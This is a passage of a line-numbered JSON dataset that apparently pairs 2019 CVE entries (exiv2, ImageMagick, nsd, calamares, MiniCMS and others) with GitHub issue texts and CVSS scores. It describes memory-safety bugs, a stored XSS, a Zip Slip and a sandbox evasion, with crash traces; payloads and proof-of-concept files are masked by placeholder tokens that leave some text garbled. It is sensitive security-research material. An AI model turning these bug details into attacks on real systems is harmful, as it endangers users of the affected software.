  35962. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/790",
  35963. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/790",
  35964. "Repo_new": "exiv2/exiv2",
  35965. "Issue_Created_At": "2019-04-24T15:39:42Z",
  35966. "description": "Integer overflow, leading to very large allocation in APITAG This issue is closely related to NUMBERTAG but the consequences of this bug are different. The calculation of ERRORTAG at APITAG URLTAG can have a negative integer overflow which leads to an NUMBERTAG GB memory allocation in APITAG . Also, the zlib decompression is run on uninitialized memory beyond the end of the buffer, so there is a potential info leak vulnerability here. Here is the APITAG which I have tested on master NUMBERTAG dfdb9 URLTAG : FILETAG . The simplest way to see the bug is to use ulimit to reduce the amount of available memory to less than NUMBERTAG GB: ERRORTAG",
  35967. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  35968. "severity": "MEDIUM",
  35969. "baseScore": 6.5,
  35970. "impactScore": 3.6,
  35971. "exploitabilityScore": 2.8
  35972. },
  35973. {
  35974. "CVE_ID": "CVE-2019-13110",
  35975. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/843",
  35976. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/843",
  35977. "Repo_new": "exiv2/exiv2",
  35978. "Issue_Created_At": "2019-05-13T12:58:33Z",
  35979. "description": "Integer overflow causes out of bounds read in APITAG",
  35980. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  35981. "severity": "MEDIUM",
  35982. "baseScore": 6.5,
  35983. "impactScore": 3.6,
  35984. "exploitabilityScore": 2.8
  35985. },
  35986. {
  35987. "CVE_ID": "CVE-2019-13111",
  35988. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/791",
  35989. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/791",
  35990. "Repo_new": "exiv2/exiv2",
  35991. "Issue_Created_At": "2019-04-24T16:03:00Z",
  35992. "description": "Integer overflow, leading to very large allocation in APITAG There is a bug at APITAG URLTAG . If APITAG then the subtraction overflows and the bounds check on size is ineffective. There is an additional problem in this function, which is that the error conditions are not checked after the calls to APITAG . Calls to APITAG should always be followed by calls to ERRORTAG and APITAG , to make sure that the buffer was read successfully. This means that the code does not notice that the file size is much smaller than the value of size would suggest. This has enabled me to write a APITAG which causes exi NUMBERTAG to run for almost a minute, scanning NUMBERTAG GB of uninitialized memory. Here is the APITAG which I have tested on master NUMBERTAG dfdb9 URLTAG : FILETAG . You can run the APITAG like this to see the long running behavior: CODETAG Or if you use ulimit to lower the maximum allocation size to less than NUMBERTAG GB then exi NUMBERTAG will crash: ERRORTAG",
  35993. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  35994. "severity": "MEDIUM",
  35995. "baseScore": 5.5,
  35996. "impactScore": 3.6,
  35997. "exploitabilityScore": 1.8
  35998. },
  35999. {
  36000. "CVE_ID": "CVE-2019-13112",
  36001. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/845",
  36002. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/845",
  36003. "Repo_new": "exiv2/exiv2",
  36004. "Issue_Created_At": "2019-05-13T13:42:43Z",
  36005. "description": "Out of memory error due to unchecked allocation size in APITAG",
  36006. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36007. "severity": "MEDIUM",
  36008. "baseScore": 6.5,
  36009. "impactScore": 3.6,
  36010. "exploitabilityScore": 2.8
  36011. },
  36012. {
  36013. "CVE_ID": "CVE-2019-13113",
  36014. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/841",
  36015. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/841",
  36016. "Repo_new": "exiv2/exiv2",
  36017. "Issue_Created_At": "2019-05-13T11:53:23Z",
  36018. "description": "Invalid data location in CRW image causes exi NUMBERTAG to crash. The attached file causes an assertion failure in APITAG .",
  36019. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36020. "severity": "MEDIUM",
  36021. "baseScore": 6.5,
  36022. "impactScore": 3.6,
  36023. "exploitabilityScore": 2.8
  36024. },
  36025. {
  36026. "CVE_ID": "CVE-2019-13114",
  36027. "Issue_Url_old": "https://github.com/Exiv2/exiv2/issues/793",
  36028. "Issue_Url_new": "https://github.com/exiv2/exiv2/issues/793",
  36029. "Repo_new": "exiv2/exiv2",
  36030. "Issue_Created_At": "2019-04-24T20:14:50Z",
  36031. "description": "null pointer dereference in APITAG There is a null pointer dereference bug at APITAG URLTAG . If the HTTP server sends back a reply that does not contain a space character, then strchr returns NULL, and the result is passed to atoi without a check, leading to a null pointer dereference. To reproduce the bug (tested on master NUMBERTAG dfdb9 URLTAG ) open two terminals. In the first terminal, start a fake webserver using FILETAG : APITAG In the second terminal, try to connect to the fake webserver: APITAG There are several other calls to strcat and strstr in the same block of code URLTAG . I have not written APITAG for them, but the calls to strchr on lines NUMBERTAG URLTAG and NUMBERTAG URLTAG also look vulnerable to me, since their return values are likewise not checked for NULL.",
  36032. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36033. "severity": "MEDIUM",
  36034. "baseScore": 6.5,
  36035. "impactScore": 3.6,
  36036. "exploitabilityScore": 2.8
  36037. },
  36038. {
  36039. "CVE_ID": "CVE-2019-13125",
  36040. "Issue_Url_old": "https://github.com/Tencent/HaboMalHunter/issues/23",
  36041. "Issue_Url_new": "https://github.com/tencent/habomalhunter/issues/23",
  36042. "Repo_new": "tencent/habomalhunter",
  36043. "Issue_Created_At": "2019-07-01T00:45:15Z",
  36044. "description": "Any Malware Compiled with PIE Evades Dynamic Analysis. Currently, APITAG uses the output of the file command to check whether the target is an executable, here URLTAG . However, the file command reports any executable compiled with _PIE_ as a shared object . That means APITAG does not run dynamic analysis for any malware compiled with _PIE_ , so an attacker can bypass the dynamic analysis simply by building with PIE. Following are two executables built from the same source code, compiled with and without the \" no pie\" flag. Compiled with _PIE_ FILETAG CODETAG Analysis result of Habo is available here URLTAG Compiled without _PIE_ FILETAG CODETAG Analysis result of Habo is available here URLTAG",
  36045. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36046. "severity": "HIGH",
  36047. "baseScore": 7.8,
  36048. "impactScore": 5.9,
  36049. "exploitabilityScore": 1.8
  36050. },
  36051. {
  36052. "CVE_ID": "CVE-2019-13132",
  36053. "Issue_Url_old": "https://github.com/zeromq/libzmq/issues/3558",
  36054. "Issue_Url_new": "https://github.com/zeromq/libzmq/issues/3558",
  36055. "Repo_new": "zeromq/libzmq",
  36056. "Issue_Created_At": "2019-06-27T23:54:02Z",
  36057. "description": "Critical security bug report email and GPG address needed. I found a critical security bug of libzmq and would like to report it confidentially, so that hopefully the bug can be fixed before we disclose it. It appears the only information I can find about reporting security bug is here in FAQ URLTAG Besides opening an issue here, do you folks have an email address and corresponding GPG key I can send the details of this bug over?",
  36058. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36059. "severity": "CRITICAL",
  36060. "baseScore": 9.8,
  36061. "impactScore": 5.9,
  36062. "exploitabilityScore": 3.9
  36063. },
  36064. {
  36065. "CVE_ID": "CVE-2019-13133",
  36066. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1600",
  36067. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1600",
  36068. "Repo_new": "imagemagick/imagemagick",
  36069. "Issue_Created_At": "2019-06-18T10:55:16Z",
  36070. "description": "Memory leak in APITAG in coder/bmp.c and APITAG in coder/viff.c.. Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There are two memory leak issues in APITAG in coder/bmp.c and APITAG in coder/viff.c. There is a patch URLTAG which fixed multiple memory leak vulnerabilities. However, the patch for APITAG is wrong. CODETAG Below is the correct logic. CODETAG URLTAG At the same time, there is the same issue in APITAG CODETAG URLTAG Steps to Reproduce APITAG System Configuration APITAG APITAG version: Environment APITAG system, version and so on): Additional information: APITAG",
  36071. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36072. "severity": "MEDIUM",
  36073. "baseScore": 5.5,
  36074. "impactScore": 3.6,
  36075. "exploitabilityScore": 1.8
  36076. },
  36077. {
  36078. "CVE_ID": "CVE-2019-13135",
  36079. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1599",
  36080. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1599",
  36081. "Repo_new": "imagemagick/imagemagick",
  36082. "Issue_Created_At": "2019-06-18T10:33:40Z",
  36083. "description": "Use of uninitialized value in function APITAG Prerequisites y ] I have written a descriptive issue title [ y ] I have verified that I am using the latest version of APITAG [ y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG ERRORTAG ( URLTAG We should initialize APITAG ; otherwise a use-of-uninitialized-value vulnerability occurs, similar to CVETAG (fixed in URLTAG and URLTAG ) and CVETAG (fixed in URLTAG and URLTAG APITAG",
  36084. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36085. "severity": "HIGH",
  36086. "baseScore": 8.8,
  36087. "impactScore": 5.9,
  36088. "exploitabilityScore": 2.8
  36089. },
  36090. {
  36091. "CVE_ID": "CVE-2019-13136",
  36092. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1602",
  36093. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1602",
  36094. "Repo_new": "imagemagick/imagemagick",
  36095. "Issue_Created_At": "2019-06-18T11:47:50Z",
  36096. "description": "Possible integer overflow in APITAG in coder/tiff.c. Prerequisites y ] I have written a descriptive issue title [ y ] I have verified that I am using the latest version of APITAG [ y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a possible integer overflow vulnerability in APITAG in coder/tiff.c APITAG URLTAG This issue is similar to the one which was fixed in URLTAG and URLTAG",
  36097. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36098. "severity": "HIGH",
  36099. "baseScore": 7.8,
  36100. "impactScore": 5.9,
  36101. "exploitabilityScore": 1.8
  36102. },
  36103. {
  36104. "CVE_ID": "CVE-2019-13137",
  36105. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1601",
  36106. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1601",
  36107. "Repo_new": "imagemagick/imagemagick",
  36108. "Issue_Created_At": "2019-06-18T11:02:58Z",
  36109. "description": "Memory leak in APITAG in coder/ps.c. Prerequisites Y ] I have written a descriptive issue title [ Y ] I have verified that I am using the latest version of APITAG [ Y ] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a memory leak issue in APITAG in coder/ps.c ERRORTAG URLTAG It is possible that page_geometry is not destroyed since there is a return statement before it. It is the issue which is similar to the one fixed in URLTAG",
  36110. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36111. "severity": "MEDIUM",
  36112. "baseScore": 6.5,
  36113. "impactScore": 3.6,
  36114. "exploitabilityScore": 2.8
  36115. },
  36116. {
  36117. "CVE_ID": "CVE-2019-13146",
  36118. "Issue_Url_old": "https://github.com/ankane/field_test/issues/17",
  36119. "Issue_Url_new": "https://github.com/ankane/field_test/issues/17",
  36120. "Repo_new": "ankane/field_test",
  36121. "Issue_Created_At": "2019-07-02T00:11:16Z",
  36122. "description": "Arbitrary Variants Via Query Parameters in Field Test NUMBERTAG Due to unvalidated input, an attacker can pass in arbitrary variants via query parameters. This vulnerability has been assigned the CVE identifier CVETAG . Versions Affected NUMBERTAG Fixed Versions NUMBERTAG ersions Unaffected NUMBERTAG Impact If an application treats variants as trusted, this can lead to a variety of potential vulnerabilities like SQL injection or cross site scripting (XSS). For instance: APITAG All users running an affected release should upgrade immediately.",
  36123. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:L/A:N",
  36124. "severity": "MEDIUM",
  36125. "baseScore": 5.3,
  36126. "impactScore": 1.4,
  36127. "exploitabilityScore": 3.9
  36128. },
  36129. {
  36130. "CVE_ID": "CVE-2019-13147",
  36131. "Issue_Url_old": "https://github.com/mpruett/audiofile/issues/54",
  36132. "Issue_Url_new": "https://github.com/mpruett/audiofile/issues/54",
  36133. "Repo_new": "mpruett/audiofile",
  36134. "Issue_Created_At": "2019-06-29T11:37:12Z",
  36135. "description": "NULL pointer dereference bug in ulaw2linear_buf, in APITAG There exists one NULL pointer dereference bug in ulaw2linear_buf, in APITAG which allows an attacker to cause a denial of service via a crafted file. To reproduce with the attached poc file: ./sfconvert poc output format voc FILETAG gdb output [ registers ] RA NUMBERTAG ffff NUMBERTAG RB NUMBERTAG RC NUMBERTAG RD NUMBERTAG e NUMBERTAG RSI NUMBERTAG d7c ('|}') RDI NUMBERTAG ffffffff RBP NUMBERTAG fffebce NUMBERTAG RSP NUMBERTAG fffffffe2a NUMBERTAG ffff7b NUMBERTAG ef6 APITAG int NUMBERTAG mov rax,QWORD PTR [rsp NUMBERTAG RIP NUMBERTAG ffff7b NUMBERTAG bf APITAG mov WORD PTR [rbx+r NUMBERTAG ax) R NUMBERTAG R NUMBERTAG b NUMBERTAG R NUMBERTAG af NUMBERTAG e9 R NUMBERTAG R NUMBERTAG R NUMBERTAG R NUMBERTAG R NUMBERTAG b NUMBERTAG ffff7dd NUMBERTAG ffff7b NUMBERTAG APITAG lea rsp,[rsp NUMBERTAG EFLAGS NUMBERTAG carry PARITY adjust zero SIGN trap INTERRUPT direction overflow) [ code NUMBERTAG ffff7b NUMBERTAG ac APITAG lea rsp,[rsp NUMBERTAG ffff7b NUMBERTAG b4 APITAG movzx edi,BYTE PTR [rbp+r NUMBERTAG ffff7b NUMBERTAG ba APITAG call NUMBERTAG ffff7b NUMBERTAG APITAG NUMBERTAG ffff7b NUMBERTAG bf APITAG mov WORD PTR [rbx+r NUMBERTAG a NUMBERTAG ffff7b NUMBERTAG c4 APITAG add r NUMBERTAG ffff7b NUMBERTAG c8 APITAG cmp QWORD PTR [rsp NUMBERTAG r NUMBERTAG ffff7b NUMBERTAG cd APITAG je NUMBERTAG ffff7b NUMBERTAG APITAG NUMBERTAG ffff7b NUMBERTAG d3 APITAG nop [ stack NUMBERTAG fffffffe2a NUMBERTAG ffff7b NUMBERTAG ef6 APITAG int NUMBERTAG mov rax,QWORD PTR [rsp NUMBERTAG fffffffe2a NUMBERTAG fffffffe2b NUMBERTAG aaaa NUMBERTAG fffffffe2b NUMBERTAG ffff7b1ae NUMBERTAG APITAG int, void , int NUMBERTAG mov rax,QWORD PTR [rsp NUMBERTAG fffffffe2c NUMBERTAG fffffffe2c NUMBERTAG fffffffe2d NUMBERTAG b NUMBERTAG fff NUMBERTAG fffffffe2d NUMBERTAG af NUMBERTAG e9 [ ] Legend: code, data, rodata, value Stopped reason: SIGSEG NUMBERTAG ffff7b NUMBERTAG bf in ulaw2linear_buf (nsamples=<optimized 
out>, linear=<optimized out>, ulaw=<optimized out>) at APITAG NUMBERTAG linear[i] = _af_ulaw2linear(ulaw[i]); gdb peda$ bt NUMBERTAG ffff7b NUMBERTAG bf in ulaw2linear_buf (nsamples=<optimized out>, linear=<optimized out>, ulaw=<optimized out>) at APITAG NUMBERTAG APITAG (this NUMBERTAG b NUMBERTAG at APITAG NUMBERTAG ffff7b1b4b6 in APITAG (file=<optimized out>, trackid=<optimized out>, samples NUMBERTAG nvframeswanted=<optimized out>) at APITAG NUMBERTAG f9e in copyaudiodata (infile NUMBERTAG ae NUMBERTAG outfile NUMBERTAG b6c0, trackid NUMBERTAG e9) at APITAG NUMBERTAG e1 in main (argc=argc APITAG APITAG at APITAG NUMBERTAG ffff NUMBERTAG f3b NUMBERTAG in __libc_start_main (main NUMBERTAG APITAG , argc NUMBERTAG arg NUMBERTAG fffffffe NUMBERTAG init=<optimized out>, fini=<optimized out>, rtld_fini=<optimized out>, stack_end NUMBERTAG fffffffe4f8) at PATHTAG NUMBERTAG c3a in _start ()",
  36136. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36137. "severity": "MEDIUM",
  36138. "baseScore": 6.5,
  36139. "impactScore": 3.6,
  36140. "exploitabilityScore": 2.8
  36141. },
  36142. {
  36143. "CVE_ID": "CVE-2019-13178",
  36144. "Issue_Url_old": "https://github.com/calamares/calamares/issues/1190",
  36145. "Issue_Url_new": "https://github.com/calamares/calamares/issues/1190",
  36146. "Repo_new": "calamares/calamares",
  36147. "Issue_Created_At": "2019-07-02T18:57:53Z",
  36148. "description": "Race condition in changing permissions. Hello, please note that there's a race condition between the time when the key file is created and when the permissions are changed, during which the file is probably visible to some or all users on the system. The safe way to create a file with restricted permissions is to set the process umask NUMBERTAG before creating the file, so the file is never world-readable, rather than tightening the permissions afterwards. The shell built-in umask NUMBERTAG command can do this. Thanks",
  36149. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36150. "severity": "HIGH",
  36151. "baseScore": 8.1,
  36152. "impactScore": 5.9,
  36153. "exploitabilityScore": 2.2
  36154. },
  36155. {
  36156. "CVE_ID": "CVE-2019-13178",
  36157. "Issue_Url_old": "https://github.com/calamares/calamares/issues/1191",
  36158. "Issue_Url_new": "https://github.com/calamares/calamares/issues/1191",
  36159. "Repo_new": "calamares/calamares",
  36160. "Issue_Created_At": "2019-07-02T19:21:31Z",
  36161. "description": "Unsafe generation of initramfs during FDE. Downstream bug CVETAG, IRC logs from the user who reported it URLTAG. The tl;dr is: APITAG initramfs images that are generated by mkinitramfs will have the user:group set to root:root, but their access flags will be world-readable (NUMBERTAG rw r r ). This means that any user, or even a script, that has read access to the file system can read and extract the secret keyfile from an initramfs image.\" The initramfs generation needs to be run with a more restrictive umask here, so that the generated image is not readable by unprivileged users.",
  36162. "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36163. "severity": "HIGH",
  36164. "baseScore": 8.1,
  36165. "impactScore": 5.9,
  36166. "exploitabilityScore": 2.2
  36167. },
  36168. {
  36169. "CVE_ID": "CVE-2019-13186",
  36170. "Issue_Url_old": "https://github.com/bg5sbk/MiniCMS/issues/31",
  36171. "Issue_Url_new": "https://github.com/bg5sbk/minicms/issues/31",
  36172. "Repo_new": "bg5sbk/minicms",
  36173. "Issue_Created_At": "2019-07-03T05:22:37Z",
  36174. "description": "A stored XSS was found in mc admin/post APITAG A stored XSS was found in mc admin/post APITAG This vulnerability is similar to CVETAG but in a different place. POC: First, enter the PATHTAG page and write the payload \u201d APITAG APITAG \u201d into the tags box: FILETAG Save it, then return to the main page and go to the archive page: FILETAG An alert window then pops up showing the domain, which shows the tag value is rendered without escaping: FILETAG",
  36175. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  36176. "severity": "MEDIUM",
  36177. "baseScore": 6.1,
  36178. "impactScore": 2.7,
  36179. "exploitabilityScore": 2.8
  36180. },
  36181. {
  36182. "CVE_ID": "CVE-2019-13207",
  36183. "Issue_Url_old": "https://github.com/NLnetLabs/nsd/issues/20",
  36184. "Issue_Url_new": "https://github.com/nlnetlabs/nsd/issues/20",
  36185. "Repo_new": "nlnetlabs/nsd",
  36186. "Issue_Created_At": "2019-06-28T12:12:53Z",
  36187. "description": "Stack based Buffer Overflow in the APITAG function. Hi, While fuzzing nsd checkzone with American Fuzzy Lop, I found a Stack based Buffer Overflow in the APITAG function, in dname.c L NUMBERTAG Attaching a reproducer (gzipped so APITAG accepts it), issue can be reproduced by running: nsd checkzone all.rr zone NUMBERTAG FILETAG APITAG NUMBERTAG ERROR: APITAG stack buffer overflow on address NUMBERTAG ffcd6a NUMBERTAG f at pc NUMBERTAG dadbc bp NUMBERTAG ffcd6a NUMBERTAG sp NUMBERTAG ffcd6a NUMBERTAG cc0 WRITE of size NUMBERTAG at NUMBERTAG ffcd6a NUMBERTAG f thread T NUMBERTAG dadbb in __asan_memcpy ( PATHTAG NUMBERTAG in dname_concatenate PATHTAG NUMBERTAG e NUMBERTAG f in yyparse PATHTAG NUMBERTAG fd1 in zonec_read PATHTAG NUMBERTAG aedd1 in check_zone PATHTAG NUMBERTAG aea NUMBERTAG in main PATHTAG NUMBERTAG fa NUMBERTAG ece6b NUMBERTAG in __libc_start_main PATHTAG NUMBERTAG c1d9 in _start ( PATHTAG ) Address NUMBERTAG ffcd6a NUMBERTAG f is located in stack of thread T0 at offset NUMBERTAG in frame NUMBERTAG f8f in dname_concatenate PATHTAG This frame has NUMBERTAG object(s NUMBERTAG temp' (line NUMBERTAG APITAG NUMBERTAG ad4aec NUMBERTAG f3 f3 f3 f3 f3 f3 f3 f NUMBERTAG ad4aed NUMBERTAG ad4aee NUMBERTAG ad4aef NUMBERTAG f1 f1 f1 f NUMBERTAG ad4af NUMBERTAG ad4af NUMBERTAG Shadow byte legend (one shadow byte represents NUMBERTAG application bytes): Addressable NUMBERTAG Partially addressable NUMBERTAG Heap left redzone: fa Freed heap region: fd Stack left redzone: f1 Stack mid redzone: f2 Stack right redzone: f3 Stack after return: f5 Stack use after scope: f8 Global redzone: f9 Global init order: f6 Poisoned by user: f7 Container overflow: fc Array cookie: ac Intra object redzone: bb APITAG internal: fe Left alloca redzone: ca Right alloca redzone: cb NUMBERTAG ABORTING",
  36188. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  36189. "severity": "CRITICAL",
  36190. "baseScore": 9.8,
  36191. "impactScore": 5.9,
  36192. "exploitabilityScore": 3.9
  36193. },
  36194. {
  36195. "CVE_ID": "CVE-2019-13238",
  36196. "Issue_Url_old": "https://github.com/axiomatic-systems/Bento4/issues/396",
  36197. "Issue_Url_new": "https://github.com/axiomatic-systems/bento4/issues/396",
  36198. "Repo_new": "axiomatic-systems/bento4",
  36199. "Issue_Created_At": "2019-05-24T14:17:26Z",
  36200. "description": "Unhandled memory allocation failure under memory exhaustion. A memory allocation failure is not handled in APITAG and leads to crashes. APITAG APITAG APITAG allocate a new buffer to parse the atom in the stream. Because the allocation failure is not checked, the content that was read is memcpy'd to a NULL pointer. APITAG This is the starting point. FILETAG FILETAG APITAG is the macro definition of memcpy, which completes the path. Asan trace report: ERRORTAG",
  36201. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  36202. "severity": "HIGH",
  36203. "baseScore": 7.5,
  36204. "impactScore": 3.6,
  36205. "exploitabilityScore": 3.9
  36206. },
  36207. {
  36208. "CVE_ID": "CVE-2019-13241",
  36209. "Issue_Url_old": "https://github.com/Sigil-Ebook/flightcrew/issues/52",
  36210. "Issue_Url_new": "https://github.com/sigil-ebook/flightcrew/issues/52",
  36211. "Repo_new": "sigil-ebook/flightcrew",
  36212. "Issue_Created_At": "2019-06-26T15:23:52Z",
  36213. "description": "Zip Slip Vulnerability in APITAG Summary APITAG NUMBERTAG and older are vulnerable to a directory traversal, allowing attackers to write arbitrary files via a ../ (dot dot slash) in a Zip archive entry that is mishandled during extraction. This vulnerability is also known as 'Zip Slip'. Impact This vulnerability can be used to write files to arbitrary locations and could potentially result in granting an attacker remote access or arbitrary code execution. This is a medium severity issue for Sigil users, but may have greater impact on third-party software that uses APITAG as a library. Steps to Reproduce NUMBERTAG Download the attached \"zip APITAG NUMBERTAG On a Linux system, process the epub using the flightcrew CLI. APITAG NUMBERTAG Check for the existence of PATHTAG with the contents \"this is an evil one\". Further Reading For more information on zip slip vulnerabilities, see URLTAG FILETAG",
  36214. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36215. "severity": "HIGH",
  36216. "baseScore": 7.8,
  36217. "impactScore": 5.9,
  36218. "exploitabilityScore": 1.8
  36219. },
  36220. {
  36221. "CVE_ID": "CVE-2019-13295",
  36222. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1608",
  36223. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1608",
  36224. "Repo_new": "imagemagick/imagemagick",
  36225. "Issue_Created_At": "2019-06-21T05:58:31Z",
  36226. "description": "heap buffer overflow at APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow at APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36227. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36228. "severity": "HIGH",
  36229. "baseScore": 8.8,
  36230. "impactScore": 5.9,
  36231. "exploitabilityScore": 2.8
  36232. },
  36233. {
  36234. "CVE_ID": "CVE-2019-13296",
  36235. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1604",
  36236. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1604",
  36237. "Repo_new": "imagemagick/imagemagick",
  36238. "Issue_Created_At": "2019-06-18T17:22:26Z",
  36239. "description": "Direct memory leak in APITAG and indirect memory leaks. Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There is a direct memory leak in APITAG of APITAG and many indirect memory leaks. Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36240. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  36241. "severity": "MEDIUM",
  36242. "baseScore": 6.5,
  36243. "impactScore": 3.6,
  36244. "exploitabilityScore": 2.8
  36245. },
  36246. {
  36247. "CVE_ID": "CVE-2019-13297",
  36248. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1609",
  36249. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1609",
  36250. "Repo_new": "imagemagick/imagemagick",
  36251. "Issue_Created_At": "2019-06-21T06:02:04Z",
  36252. "description": "heap buffer overflow at APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow at APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36253. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36254. "severity": "HIGH",
  36255. "baseScore": 8.8,
  36256. "impactScore": 5.9,
  36257. "exploitabilityScore": 2.8
  36258. },
  36259. {
  36260. "CVE_ID": "CVE-2019-13298",
  36261. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1611",
  36262. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1611",
  36263. "Repo_new": "imagemagick/imagemagick",
  36264. "Issue_Created_At": "2019-06-21T06:07:48Z",
  36265. "description": "heap buffer overflow at APITAG APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow at APITAG APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
  36266. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  36267. "severity": "HIGH",
  36268. "baseScore": 8.8,
  36269. "impactScore": 5.9,
  36270. "exploitabilityScore": 2.8
  36271. },
  36272. {
  36273. "CVE_ID": "CVE-2019-13299",
  36274. "Issue_Url_old": "https://github.com/ImageMagick/ImageMagick/issues/1610",
  36275. "Issue_Url_new": "https://github.com/imagemagick/imagemagick/issues/1610",
  36276. "Repo_new": "imagemagick/imagemagick",
  36277. "Issue_Created_At": "2019-06-21T06:05:24Z",
  36278. "description": "heap buffer overflow at APITAG APITAG in APITAG Prerequisites x] I have written a descriptive issue title [x] I have verified that I am using the latest version of APITAG [x] I have searched [open URLTAG and closed URLTAG issues to ensure it has not already been reported Description APITAG There's a heap buffer overflow at APITAG APITAG in APITAG Steps to Reproduce APITAG APITAG version: Version: APITAG NUMBERTAG Q NUMBERTAG FILETAG Environment APITAG system, version and so on): Description: Ubuntu NUMBERTAG LTS Release NUMBERTAG Codename: bionic Additional information: CC=clang NUMBERTAG CXX=clang NUMBERTAG configure disable openmp APITAG",
